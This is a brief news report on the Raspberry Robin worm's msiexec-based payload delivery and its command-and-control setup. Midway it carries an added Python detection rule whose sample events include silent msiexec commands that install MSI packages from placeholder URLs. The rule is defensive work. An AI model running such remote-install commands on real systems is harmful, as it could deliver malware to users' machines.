Numerous threat actors could repurpose Raspberry Robin, also known as QNAP worm, for their own attacks, reports The Hacker News.
Raspberry Robin, which has been attributed to DEV-0856, was discovered by SEKOIA researchers to have at least eight Linode-based virtual private servers acting as a second command-and-control layer on top of compromised QNAP network-attached storage devices.
Such attack infrastructure supports an attack chain that begins when a Windows shortcut file on an inserted USB drive is launched, invoking the msiexec utility, which then downloads the main obfuscated Raspberry Robin payload. Researchers noted that because the malware is retrieved through HTTP requests issued by msiexec, those requests could be hijacked to deliver other rogue MSI payloads.
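The delivery step described above, msiexec fetching an MSI package from an HTTP(S) URL, is a narrow behaviour that endpoint telemetry can flag. The following detection logic is an added example, not code from the article or from SEKOIA; it assumes Sysmon-style process-creation fields (image, parent image, command line) and runs over constructed sample events with placeholder hostnames.

```python
import re
import shlex

# Constructed sample process-creation events (not real telemetry); hostnames are placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"msiexec /q /i http://placeholder.invalid/update.msi"},
    {"id": 2, "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'msiexec /i "C:\Users\alice\Downloads\tool.msi" /qn'},
    {"id": 3, "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'msiexec -quiet -package "https://placeholder.invalid/a/b"'},
    {"id": 4, "image": r"C:\Windows\System32\rundll32.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32 http://placeholder.invalid/x"},
]

REMOTE_RE = re.compile(r"^https?://", re.IGNORECASE)          # package source is a URL
QUIET_RE = re.compile(r"^[/-](q[nb]?|quiet)$", re.IGNORECASE)  # silent-install switches


def basename(path):
    """Last path component of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def remote_msiexec_install(event):
    """Return a finding if msiexec is asked to install a package from an HTTP(S) URL, else None."""
    if basename(event["image"]) != "msiexec.exe":
        return None
    # posix=False keeps Windows backslashes intact and leaves quotes on quoted tokens.
    tokens = [t.strip('"') for t in shlex.split(event["cmdline"], posix=False)]
    urls = [t for t in tokens if REMOTE_RE.match(t)]
    if not urls:
        return None
    quiet = any(QUIET_RE.match(t) for t in tokens)
    return {
        "id": event["id"],
        "url": urls[0],
        "parent": basename(event["parent"]),
        "quiet": quiet,
        # A silent install from a remote URL is the higher-confidence pattern.
        "severity": "high" if quiet else "medium",
    }


def scan(events):
    """Apply the rule to every event and keep only the findings."""
    return [f for f in map(remote_msiexec_install, events) if f]
```

Local MSI installs (event 2) and other tools that merely carry a URL on their command line (event 4) are not flagged; the rule keys on msiexec itself being handed a remote package.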
"By pointing this domain to our sinkhole, we were able to obtain telemetry from one of the first domains used by Raspberry Robin operators," said SEKOIA, which added that the Raspberry Robin domain could still be reused for other malicious activities.